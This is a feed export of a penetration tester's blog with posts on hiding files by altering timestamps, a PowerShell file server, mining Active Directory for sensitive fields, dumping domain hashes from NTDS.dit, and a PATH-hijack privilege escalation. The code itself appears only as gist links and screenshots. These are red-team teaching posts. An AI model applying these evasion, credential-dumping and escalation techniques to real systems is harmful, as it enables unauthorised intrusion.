tag:blogger.com,1999:blog-84534533007361079612024-03-19T06:23:43.910-04:00obscuresecNothing new to see here.Chrishttp://www.blogger.com/profile/10815120708533310068noreply@blogger.comBlogger40125tag:blogger.com,1999:blog-8453453300736107961.post-58586235201230033322014-05-19T20:45:00.001-04:002014-05-19T22:04:04.777-04:00Modifying MAC properties with PowerShellLaziness is the demise of Red Team engagements. Whether it is writing <a href="http://vimeo.com/92359423#t=3m20s">PsExec to a user's desktop</a> or writing other arbitrary binaries to disk, not being careful can lead to being discovered. One of the competitors of this year's National CCDC mentioned to me that his team focused on discovering files created during the competition. If we were all being careful, that shouldn't work. Linux has the ability to modify file attributes with the "<a href="http://www.linfo.org/touch.html">Touch</a>" utility. Meterpreter has <a href="http://www.offensive-security.com/metasploit-unleashed/Timestomp">TimeStomp</a> which works on Windows and makes it easy to blend your files with files around it by modifying the <a href="http://www.forensicswiki.org/wiki/New_Technology_File_System_(NTFS)">MACE attributes</a>.<br />
<br />
After a request to add the capability to<a href="https://github.com/mattifestation/PowerSploit"> PowerSploit</a>, I wanted to figure out how to do it (I do prefer avoiding writing anything to disk, but there are times when it is unavoidable). I always thought that TimeStomp was black magic, but then I noticed the capability in <a href="http://blog.strategiccyber.com/2014/03/13/cobalt-strike-03-13-14-neccdc-edition/">Cobalt Strike</a>'s Beacon. I asked <a href="https://twitter.com/armitagehacker">Raphael</a> and he pointed me to a well-documented part of the <a href="http://msdn.microsoft.com/en-us/library/windows/desktop/ms724933(v=vs.85).aspx">Windows API</a>. So naturally I headed over to <a href="http://pinvoke.net/default.aspx/kernel32/SetFileTime.html">pinvoke.net</a> to check out the C# sample. It didn't take long to have a working function, but I got curious and found a <a href="http://msdn.microsoft.com/en-us/library/system.io.file.aspx">.Net class</a> to simplify the code. Armed with two working functions, I boarded the plane after <a href="https://www.youtube.com/watch?v=j9HMjaI9qgk">ShowMeCon</a> and wondered if it were possible to accomplish the task in a more "PowerShelly" (technical term) way.<br />
<br />
Lets explore with Get-Member:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgKm55rnzzo9mDWQQTU7ZwjJ04wF28lBvIIuC0v-hpFnvuQbu_gVeJ5hTbvSlaRPzivP-TKrlD5j8ktav4OFZWiOgaXlAfgaoOCjMxYDEWM7rMjJk-foYmtOuyWmNvkekoqnMYD8G_vU3A/s1600/gm.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgKm55rnzzo9mDWQQTU7ZwjJ04wF28lBvIIuC0v-hpFnvuQbu_gVeJ5hTbvSlaRPzivP-TKrlD5j8ktav4OFZWiOgaXlAfgaoOCjMxYDEWM7rMjJk-foYmtOuyWmNvkekoqnMYD8G_vU3A/s1600/gm.png" height="331" width="400" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
Wow, we can set the modified, accessed and created properties with Get-Item. That means we can simply run:<br />
<br />
<script src="https://gist.github.com/obscuresec/7b0cf71d7a8dd5e7b54c.js"></script><br />
Nothing novel, but cool nonetheless. Some people would prefer a more "Touch" like capability, so I wrapped it all up in a function called Set-MacAttributes which will be added to PowerSploit soon:<br />
<br />
<script src="https://gist.github.com/obscuresec/25e8a142eb08bf237799.js"></script>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgY3wSdPoYI_SqzN_RllUMBPREe7Bg68Tmc9nsFlzp6IFmTTrfdAnyQk0BY7qswsEYsBEJH3yFOCcl6rA-rRu2bXKyOLsC0GAZTceeS-LXzmE5lfa4T5DngGwxPm5Bt8PlfaZ9BJrQX0_o/s1600/mac.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgY3wSdPoYI_SqzN_RllUMBPREe7Bg68Tmc9nsFlzp6IFmTTrfdAnyQk0BY7qswsEYsBEJH3yFOCcl6rA-rRu2bXKyOLsC0GAZTceeS-LXzmE5lfa4T5DngGwxPm5Bt8PlfaZ9BJrQX0_o/s1600/mac.PNG" height="211" width="400" /></a></div>
<br />
I think its a prime example of why you should start by exploring cmdlets, then check out .Net and finally the API. It can save you a lot of time when you are building PowerShell tools. Obviously this won't stand up to forensic scrutiny like TimeStomp will, but it will definitely serve the purpose of hiding files in plain sight.<br />
<br />
-Chris<br />
<b><br /></b>
<br />
<br />Chrishttp://www.blogger.com/profile/10815120708533310068noreply@blogger.com2tag:blogger.com,1999:blog-8453453300736107961.post-39120238790210041772014-05-18T13:04:00.000-04:002014-05-18T16:18:01.814-04:00Dirty PowerShell WebServerI was recently asked why there wasn't a PowerShell entry in this<a href="https://gist.github.com/willurd/5720255"> great list of web-server one-liners</a>. Of course it is possible, but not as easy as with other scripting languages. Web-servers are dangerous in the wrong hands, but testers use them all the time (not always safely). I have seen people upload utilities like <a href="https://code.google.com/p/mongoose/">Mongoose</a> to accomplish serving static files, but it can be accomplished with PowerShell and the <a href="http://msdn.microsoft.com/en-us/library/vstudio/system.net.httplistener">.Net httplistener class</a>. The goal of the one-liners was to serve static files from the present working directory on port 8000. Since we know the goal is to have a small and dirty script, we can skip error-handling and use aliases:<br />
<br />
<script src="https://gist.github.com/obscuresec/71df69d828e6e05986e9.js"></script>
<br />
So that wasn't painful, but not too helpful. How did we get here? Lets pipe the created object to Get-Member and explore the relevant properties and methods.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiBBYS1H4HGwJX7Id4Oi3lKtbIc9fUp_aXKuXPhkKVD66s30A4waw6bA_zQAkuHhvaS8gW9SPnHtB0_V-1yh1yKfjoQ6-rr8NDnad2mZt5Zt4xvniazjIEOrhDKG560puQCV9u3s0EyntQ/s1600/gmlistener.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiBBYS1H4HGwJX7Id4Oi3lKtbIc9fUp_aXKuXPhkKVD66s30A4waw6bA_zQAkuHhvaS8gW9SPnHtB0_V-1yh1yKfjoQ6-rr8NDnad2mZt5Zt4xvniazjIEOrhDKG560puQCV9u3s0EyntQ/s1600/gmlistener.PNG" height="216" width="400" /></a></div>
<br />
Now that we can put together a basic usage of the httplistener object, lets explore some of the properties of the request. Specifically, we need to know what part of the request we can use to find the name of the file. We can use the debugger that comes with the ISE to catch our loop and use the console to enumerate each of the properties until we find the one we want:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjY-hN7WBXVoN3Tpe2gLwEe6ort-p8QtnMpyrgaS6wfWE-QmW_jmuLjnMTdOnQ4-3oLuU30K-L3-kmHfIEFkUtH5TXK1y-3M4XLUJ4NCceaS_UItxQen4Itjs_1hsZjCMpi5NdWcnr1PWU/s1600/ise.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjY-hN7WBXVoN3Tpe2gLwEe6ort-p8QtnMpyrgaS6wfWE-QmW_jmuLjnMTdOnQ4-3oLuU30K-L3-kmHfIEFkUtH5TXK1y-3M4XLUJ4NCceaS_UItxQen4Itjs_1hsZjCMpi5NdWcnr1PWU/s1600/ise.PNG" height="371" width="400" /></a></div>
<br />
Now that we have everything put together, we just need roll it into a one-liner and encode it:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhXwrq8qu2rp_3IUkbzUfngbm6cx9z6aomqTtoy5vlVlQ7pgaKjrgeNiSnJAje6JlldSMT4HqKxEF6zjUc8IYHTJHKfrnNiHn2XsVOPGKCsN-WzmoIpg0DIpwVBN-kkYLvc36uxOgT1Y8c/s1600/web_encode.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhXwrq8qu2rp_3IUkbzUfngbm6cx9z6aomqTtoy5vlVlQ7pgaKjrgeNiSnJAje6JlldSMT4HqKxEF6zjUc8IYHTJHKfrnNiHn2XsVOPGKCsN-WzmoIpg0DIpwVBN-kkYLvc36uxOgT1Y8c/s1600/web_encode.PNG" height="95" width="400" /></a></div>
<br />
<br />
Finally, we have our encoded one-liner which will statically serve files from the present working directory.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj8_pZh7GvIbpzy8P5PMAchyPueF7pigI0EDYt6KcODeXHfL3RoqgMhVEuCqCh3G5kbR0XD9y8cj19VqORFfLGRsU451xZ-0zOQTBHLsB2zY1hkfSJb_d4wtzZ_h-sm39JyUUeWkUdQEqY/s1600/cmd.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj8_pZh7GvIbpzy8P5PMAchyPueF7pigI0EDYt6KcODeXHfL3RoqgMhVEuCqCh3G5kbR0XD9y8cj19VqORFfLGRsU451xZ-0zOQTBHLsB2zY1hkfSJb_d4wtzZ_h-sm39JyUUeWkUdQEqY/s1600/cmd.PNG" height="131" width="400" /></a></div>
<br />
We will need to have admin rights to grab a port, but otherwise it is pretty handy.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEguwzCnHp9El4cTeVuUGGAkv1oNEOVHxY7apsSNWgnFtbf1mB0sy1gVrs_Pv4RbwsOxM3Svqpr2uix5Zk4QvnsbX16klmCgg-KtHAnQfudJMXErPluVxkBPhWrpCGoq-8yaVuYijNSiEzs/s1600/fileserve.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEguwzCnHp9El4cTeVuUGGAkv1oNEOVHxY7apsSNWgnFtbf1mB0sy1gVrs_Pv4RbwsOxM3Svqpr2uix5Zk4QvnsbX16klmCgg-KtHAnQfudJMXErPluVxkBPhWrpCGoq-8yaVuYijNSiEzs/s1600/fileserve.PNG" height="143" width="400" /></a></div>
<br />
Thanks for reading about the basics of the httplistener class, maybe you will find it useful.<br />
<br />
-ChrisChrishttp://www.blogger.com/profile/10815120708533310068noreply@blogger.com0tag:blogger.com,1999:blog-8453453300736107961.post-67766529733457103302014-04-30T01:47:00.002-04:002014-05-18T17:41:08.520-04:00Custom Properties and Descriptions in ADOne of the first things I like to do when I land on a domain-joined machine is enumerate the domain. Sometimes I do this even before attempting to privilege escalate. Sometimes a few<a href="http://technet.microsoft.com/en-us/library/aa996205(v=exchg.65).aspx"> LDAP queries</a> is all you need to accomplish your goal.<br />
<br />
During the planning phase of an engagement, I try to ascertain at least three data points that the organization feels are critical to their business and would be devastating if it fell into the wrong hands. That data is my ultimate goal and sometimes that data is stored in the database known as <a href="http://technet.microsoft.com/en-us/library/bb742424.aspx">Active Directory</a> (AD). I don't know if there is a single reason why organizations choose to store sensitive information in AD, but I have found it several times. PowerShell v2 introduced a <a href="http://blogs.technet.com/b/heyscriptingguy/archive/2010/08/24/use-the-powershell-adsisearcher-type-accelerator-to-search-active-directory.aspx">type accelerator</a> which makes enumerating AD quite simple and allows us to use PowerShell to manipulate the results without diving to deep into LDAP queries:<br />
<br />
<script src="https://gist.github.com/obscuresec/b6c97b423fedc4500c10.js"></script>
A simple way to enumerate all domain users from any user or machine account (this works great in situations where the "net" utility is deleted or restricted and returns much more digestible output):<br />
<br />
<script src="https://gist.github.com/obscuresec/d1bafa3013ced1b38f08.js"></script>
Additionally, we can wrap that into a simple one-liner to be run from cmd.exe (or your favorite shell). For example, if we wanted to enumerate all machines in the domain:<br />
<br />
<script src="https://gist.github.com/obscuresec/bd30a8431ee4bc32f1cd.js"></script>
Unfortunately, that pipe ("|") is going to give us problems. We can easily encode it from within PowerShell:<br />
<br />
<script src="https://gist.github.com/obscuresec/bba41defe6db2aaf09bd.js"></script>
Now we can run our query:<br />
<br />
<script src="https://gist.github.com/obscuresec/7faa11676c21ab84b888.js"></script>
Nothing earth-shattering there, but where it gets interesting is if you discover customer properties that the organization has added to the account objects. To find that, we simply enumerate the 'PropertyNames' of any of the accounts returned in the array:<br />
<br />
<script src="https://gist.github.com/obscuresec/7ee41139bada41b7c737.js"></script>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjKR2zK1dlYeqOaNyOfYLeFNuUjWMYg1NjCwq3aE6gu2KnbQ_RzttuZ6tKb9jfG5Rvl-VzQ-xqYycHSmnXIl2Co265SRqPRINUxS3jbcL3EoHCy59i9eBrrLuT8n1aXy71hw9ZNSCtqrxo/s1600/adsisearcher.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjKR2zK1dlYeqOaNyOfYLeFNuUjWMYg1NjCwq3aE6gu2KnbQ_RzttuZ6tKb9jfG5Rvl-VzQ-xqYycHSmnXIl2Co265SRqPRINUxS3jbcL3EoHCy59i9eBrrLuT8n1aXy71hw9ZNSCtqrxo/s1600/adsisearcher.png" height="310" width="400" /></a></div>
<br />
Being able to dump the social security numbers of every employee or user is obviously a critical finding, but sometimes the other data can come in handy for further social engineering attacks or to demonstrate the risk of single link clicked. I have found employee IDs, cell phone numbers, supervisor information, number of disciplinary actions, which user's internet activity was being monitored, hourly rate and salary information. In one case, the information available in AD was what was needed to request VPN credentials and remotely reset their password.<br />
<br />
Since most administrators interact with AD with a MMC snapin, they mistakingly believe that custom fields can't be viewed by other users. Fortunately, they can easily adjust the permissions on those properties to only be viewed by members of specific groups. At least then an attacker would have to privilege escalate or laterally compromise a member of one of the privileged groups. Even then, I wouldn't recommend storing sensitive information within AD.<br />
<br />
One of the default properties that I like to check is the description field. Most of the time there are just notes about the account, but other times there are passwords. Passwords are obviously valuable, but the notes can be pretty valuable as well. For example, a trend I see in many high-security enterprises is to obfuscate user account common names. This protects from account guessing attacks from open-source information, but is little protection from any legitimate or illegitimate user on the domain if the real name of the user is used in the comment field. To enumerate properties:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi61uYC3EtnIqL1-YvRRz_pYPF9svcjbfUBox95ApvXbrJMFbq3X2cWfFWlRmeAPCquM-7pU6n7sHq5PNXygHsj8NkKmvh_DZTAvLm6wmbgxARytlc0WZN66TeJF5mt0542ngM6tXm9mvs/s1600/adsiblog.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi61uYC3EtnIqL1-YvRRz_pYPF9svcjbfUBox95ApvXbrJMFbq3X2cWfFWlRmeAPCquM-7pU6n7sHq5PNXygHsj8NkKmvh_DZTAvLm6wmbgxARytlc0WZN66TeJF5mt0542ngM6tXm9mvs/s1600/adsiblog.JPG" height="321" width="400" /></a></div>
<br />
<br />
It is also worthwhile to enumerate the properties of the computer accounts as well.<br />
<br />
-Chris<br />
<br />
<br />Chrishttp://www.blogger.com/profile/10815120708533310068noreply@blogger.com1tag:blogger.com,1999:blog-8453453300736107961.post-75543125856783227632014-03-31T23:56:00.002-04:002014-04-01T00:22:56.360-04:00Retrieving NTDS.dit without a Shell on the DCIt has been increasingly common for organizations to prevent external or outbound connections from their domain controllers. I have seen some use the Windows Firewall, others use non-routable IP addresses and others have installed third-party software to prevent any type of remote access. These are all recommended practices, but some security administrators wrongfully assume that their domain hashes are safe simply because they believe that it is impossible to get a meterpreter shell on any of their DCs.<br />
<div>
<br /></div>
<div>
Sometimes you really have to work to gain Domain Admin privileges, and other times you don't. On more than one occasion (read 2) I have been able to guess a webserver password for Symantec NetBackup servers. The first time, there didn't appear to be a obvious way of converting that access to code execution, but one of the features of the product is the ability to generate custom reports. The report generation utility can be used to generate custom database queries against a Sybase database. Sybase typically runs as SYSTEM and can be used to <a href="http://infocenter.sybase.com/help/index.jsp?topic=/com.sybase.dc36273_1251/html/sprocs/X20958.htm">run commands</a>. Combine that with <a href="http://www.obscuresecurity.blogspot.com/2012/04/command-injection-to-code-execution.html">PowerShell</a> and achieving a memory-resident shell, regardless of AV product,was trivial with <a href="http://www.pentestgeek.com/2013/09/18/invoke-shellcode/">PowerSploit</a>.</div>
<div>
<br /></div>
<div>
Armed with a fully-privileged shell on a seldom used backup server, I was in business. First lets look at the tokens on the box:</div>
<div>
<br /></div>
<div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjX1U60Q8SolXSx4iygZL6sDzpxHQZgYzq5SM62QGuP_YeIiw-KTHFUkgthnOHu-dNJDNSJMtgynEkorkhFQu7VliGLz_D5AledVR1U1veLMXiuD66uHoZPvSVHYILudqG0aZNmsU4H_4I/s1600/incognito.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjX1U60Q8SolXSx4iygZL6sDzpxHQZgYzq5SM62QGuP_YeIiw-KTHFUkgthnOHu-dNJDNSJMtgynEkorkhFQu7VliGLz_D5AledVR1U1veLMXiuD66uHoZPvSVHYILudqG0aZNmsU4H_4I/s1600/incognito.JPG" height="400" width="332" /></a></div>
<br /></div>
<div>
<br /></div>
<div>
It looks like the service account is a domain admin and we can impersonate it by migrating into the netbackup service. Now its time to get the hashes and then start going after what really matters - the data. Unfortunately, I could not get the DC to initiate an outbound connection of any kind. Some combination of configuration and/or security products were preventing me from getting a shell on the DC. Without really knowing what is blocking our shells, we needed a safe way to dump the domain hashes. One method that is almost always AV-safe is to use built-in tools. There are write-ups on <a href="http://www.room362.com/blog/2013/06/10/volume-shadow-copy-ntdsdit-domain-hashes-remotely-part-1/">one method</a> of copying the <a href="http://technet.microsoft.com/en-us/library/cc961761.aspx">NTDS.dit</a>, but I prefer a <a href="https://twitter.com/obscuresec/status/437075468467306496">simpler one</a>:</div>
<div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgW34-arbDMlG_sLfp7AFfrtcGGOfv0TbXF827F-AqFK4cQitbCa8ANI3rLFPGVwrv8pG0o3wKsRzGUdvoDMe-XtPfOJtWInDAXNBe-mjByBM01Fsv5EVBU-d0qFCuK3U8xkfELFiAgrZw/s1600/wmic_hash.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgW34-arbDMlG_sLfp7AFfrtcGGOfv0TbXF827F-AqFK4cQitbCa8ANI3rLFPGVwrv8pG0o3wKsRzGUdvoDMe-XtPfOJtWInDAXNBe-mjByBM01Fsv5EVBU-d0qFCuK3U8xkfELFiAgrZw/s1600/wmic_hash.JPG" height="97" width="400" /></a></div>
<br />
This technique relies on the <a href="http://technet.microsoft.com/en-us/library/cc753343.aspx">Ntdsutil</a> binary which ships with Server 2008, but may be found on 2003 servers as well. Next, we can do something similar to obtain the <a href="http://karceh.blogspot.com/2012/08/dump-sam-files-using-batch-script-no.html">SYSTEM</a> file and download them both with Meterpreter:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgf4zASeav8YQvkfPL_t4mnHS0HR6flbykHAarx2IK-fO5ZypSpbUP6gGj2i4jI2hTp8WHutq_OfNJpENfTuPheqE7tu26m5Y2HjWA2EZZ6wmDJd5bI7lW1MEx5UmzeOGP818myJJ6-uHw/s1600/downloaded.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgf4zASeav8YQvkfPL_t4mnHS0HR6flbykHAarx2IK-fO5ZypSpbUP6gGj2i4jI2hTp8WHutq_OfNJpENfTuPheqE7tu26m5Y2HjWA2EZZ6wmDJd5bI7lW1MEx5UmzeOGP818myJJ6-uHw/s1600/downloaded.JPG" height="129" width="320" /></a></div>
<br />
Armed with the database and SYSTEM files, you can continue with <a href="http://www.room362.com/blog/2013/06/11/volume-shadow-copy-ntdsdit-domain-hashes-remotely-part-2/">extracting</a> the hashes offline. May not work in all situations, but it is another way to dump the domain hashes quickly once gaining "domain admin" rights.</div>
<div>
<br /></div>
<div>
-Chris</div>
<div>
<br /></div>
Chrishttp://www.blogger.com/profile/10815120708533310068noreply@blogger.com0tag:blogger.com,1999:blog-8453453300736107961.post-14745598544716882014-02-23T01:47:00.001-05:002014-02-23T13:57:35.289-05:00The $env:PATH Less Traveled: Subverting Trust with 3rd-Party ApplicationsSome of easiest and most effective privilege escalation attacks don't rely on vulnerabilities, but rather on misconfigurations. One common misconfiguration that is often overlooked by testers involves the Windows environment variable PATH. The PATH is considered a trusted part of the operating system. The PATH is consulted by nearly every application on a running system and one rogue entry is all that is needed to take administrative control of a system.<br />
<br />
What happens when a 3rd-party application writes its installation directory to the PATH? If the NTFS permissions of the directory aren't properly applied, then that software has a clear <a href="http://cwe.mitre.org/data/definitions/426.html">vulnerability</a>. But what if they only recommend that <a href="http://docs.python.org/2/using/windows.html#finding-the-python-executable">YOU</a> place their insecure directories in the PATH? No vulnerability to report except the one that is now on your system. Generally, an attack against Windows that leverages a 3rd-party application isn't considered a vulnerability according to their "<a href="http://technet.microsoft.com/library/cc722487.aspx#EJAA">10 Immutable Laws of Security</a>". So its not Microsoft's fault and its not the vendor's fault.<br />
<br />
If at this point you are thinking "Oh great, another <a href="https://blogs.technet.com/b/srd/archive/2010/08/23/more-information-about-dll-preloading-remote-attack-vector.aspx">DLL-preloading</a> write-up...", please hold on. Although that is still a very common and valid attack, this is slightly different. Lets see what happens when the <a href="http://www.python.org/downloads/windows/">Python installation</a> meets a feature (or <a href="http://stackoverflow.com/questions/17344887/why-does-powershell-search-every-directory-within-ones-path-for-a-psconsolehos">flaw</a>) of PowerShell v3 which allows us to potentially privilege escalate in a multi-user environment.<br />
<br />
First, lets install Python on a Windows 7 machine with appropriate <a href="http://www.microsoft.com/en-us/download/details.aspx?id=34595">WMF</a> installed.<br />
<br />
Now we can follow the recommendation to add Python to the PATH environment thereby making our machine more vulnerable to privilege escalation attacks. To be clear, we are already vulnerable due to default permissions of the installer. Any user can replace a binary and wait for another user or process to execute python. I have successfully attacked this scenario before in an engagement, but it relies on the binary being used by a more privileged account. It could also introduce other DLL preloading opportunities to binaries that wouldn't otherwise have them (its been a fun challenge to figure out how to reliably find these conditions with a script). Those binaries could be services which could be leveraged with a simple file write and reboot without the admin interaction requirement.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh5zuGbP9Uh4MZnvSWO0H5mxNODnBV3f9-yT4DgIJV38mrEzNPC_YgXa1tojNGNNqxl44Il_25JuJzYqID5DOeOXS6WGM7VAJ5Wu95EEmqucwNt4SHl2eAN7WVZ35IdpyV211SMMAdPSD8/s1600/Python_Path.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh5zuGbP9Uh4MZnvSWO0H5mxNODnBV3f9-yT4DgIJV38mrEzNPC_YgXa1tojNGNNqxl44Il_25JuJzYqID5DOeOXS6WGM7VAJ5Wu95EEmqucwNt4SHl2eAN7WVZ35IdpyV211SMMAdPSD8/s1600/Python_Path.JPG" height="113" width="400" /></a></div>
<br />
<br />
Now as a low-privilege user we can write anything we want to the 'C:\Python' directory. We want to elevate our privileges on a modern Windows system and have exhausted <a href="http://obscuresecurity.blogspot.com/2013/07/get-gpppassword.html">other methods</a>. Here is where the bug in PowerShell v3 becomes useful. Anytime you interact with the PowerShell console, either with enter or tab, the PATH is searched for the existence of 'PSConsoleHostReadline'. You can read more about why that feature was introduced <a href="http://www.leeholmes.com/blog/2012/09/13/bash-like-tab-completion-in-powershell/">here</a>. Here is what it looks like in <a href="http://technet.microsoft.com/en-us/sysinternals/bb896645.aspx">Process Monitor</a>:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgPj0l5l3a7KKzHdp7cZGgSZuFaZpnORUdoFEb0mZgLfpA23tAWoKxhROaQETTob8-qWvl0tbtXqinYiKPqH0cuXOXVCdV4meOCecwqmzDtEGIMk-CgG3xGqu1tU_SmLH34Isfk1aokbgg/s1600/procexpower.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgPj0l5l3a7KKzHdp7cZGgSZuFaZpnORUdoFEb0mZgLfpA23tAWoKxhROaQETTob8-qWvl0tbtXqinYiKPqH0cuXOXVCdV4meOCecwqmzDtEGIMk-CgG3xGqu1tU_SmLH34Isfk1aokbgg/s1600/procexpower.JPG" height="191" width="400" /></a></div>
<br />
<br />
Now we need to create a simple function and drop a PSConsoleHostReadline.CMD (or any of the extensions in the screenshot above) into any of the searched Python directories.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEinWYNZWCRv8pUjvbIujHCXCt35Rrx27Y4TMA_p4q8p2y3xK9bKTfrbcSoYqe3BAeBc8s6-gcCaqS7cOMeaaq3p-3dSG103iWVPOVURNkAGNN26Jfq47Z3ey5DBYIoQ7YTxDeayV_h-OyY/s1600/power_folder.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEinWYNZWCRv8pUjvbIujHCXCt35Rrx27Y4TMA_p4q8p2y3xK9bKTfrbcSoYqe3BAeBc8s6-gcCaqS7cOMeaaq3p-3dSG103iWVPOVURNkAGNN26Jfq47Z3ey5DBYIoQ7YTxDeayV_h-OyY/s1600/power_folder.JPG" /></a></div>
<br />
What command should we run? My first thought was to use the one described <a href="http://www.pentestgeek.com/2013/09/18/invoke-shellcode/">here</a>. But the problem is that once PowerShell is run, it will attempt to execute the file each time a line is entered. That would be problematic and could potentially put it in a loop. It can be done, but for simplicity lets take our limited user account and add it to the administrators group. Once an administrator invokes PowerShell.exe on the box:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiUHCSl7kNkyOFDA8_FO2pkMIzd8fEvT5VkXrlEELmKUIJ2kq3EO-kMYaIP6XbAE6cyOxtT3WpyJFON3dzHjcVIjkGcQXiAmvqiF-J5YgihaWbk3jyJkTM09xNmAEpS2TV8USEFTHMtXXg/s1600/priv_esc.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiUHCSl7kNkyOFDA8_FO2pkMIzd8fEvT5VkXrlEELmKUIJ2kq3EO-kMYaIP6XbAE6cyOxtT3WpyJFON3dzHjcVIjkGcQXiAmvqiF-J5YgihaWbk3jyJkTM09xNmAEpS2TV8USEFTHMtXXg/s1600/priv_esc.JPG" height="400" width="383" /></a></div>
<br />
Escalation achieved.<br />
<br />
So in order for this particular attack to work, it would require:<br />
<br />
1. An application that installs with insecure permissions (such as the default at 'C:\').<br />
2. That application's path being added to the PATH either by the install or after.<br />
3. PowerShell being at Version 3 (default on Windows 8).<br />
4. A privileged account executing PowerShell on the box.<br />
<br />
Maybe this scenario is a bit far-fetched, but let me assure you that there are lots of applications that automatically add themselves to PATH and allow "Authenticated Users" to write to their directory. To see how common this and other permissions-based vulnerabilities are, I tested the new functions against over 1000 common Windows installations. The result has me buried in the disclosure process with several projects. My hope is to reference this blog post to speed things along enough to present my findings (with references to the vulnerable software) at a conference or two this Summer and Fall. I also look forward to polishing the scripts up so they can be integrated with PowerSploit this Spring.<br />
<br />
Lastly, this post came about from a series of discussions with <a href="https://twitter.com/mattifestation">Matt</a> about the new privilege escalation functions that will be added to <a href="https://github.com/mattifestation/PowerSploit/">PowerSploit</a> and the about the PATH. He discovered the potential for misuse of the feature in PowerShell and reported it to Microsoft a year ago (it was subsequently removed from version 4 of PowerShell). He also brought up a few other potential attack vectors like PowerShell profiles and modules. After all, this is just one example of how applications that subvert the trusted PATH can be exploited.<br />
<br />
-Chris<br />
<br />
<br />
<h3 class="post-title entry-title" style="background-color: white; color: #333333; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 18px; font-weight: normal; margin: 0px; position: relative;">
</h3>
<div>
<br /></div>
Chrishttp://www.blogger.com/profile/10815120708533310068noreply@blogger.com0tag:blogger.com,1999:blog-8453453300736107961.post-14262300847852429642014-02-10T15:12:00.003-05:002014-02-10T15:12:35.716-05:00Resolving Hostnames with PowerShell and the PipelineThanks to Matt, <a href="https://github.com/mattifestation/PowerSploit">PowerSploit</a> has had a function to resolve hostnames to IP addresses for a while. The <a href="https://github.com/mattifestation/PowerSploit/blob/master/Recon/Invoke-ReverseDnsLookup.ps1">Invoke-ReverseDnsLookup</a> utility is useful in mapping a domain from inside or out. Often, organizations use overly-descriptive names which can help an attacker narrow down their targets during initial recon and again once they have a foothold on the inside of a network. If you haven't used it, you should check it out.<br />
<br />
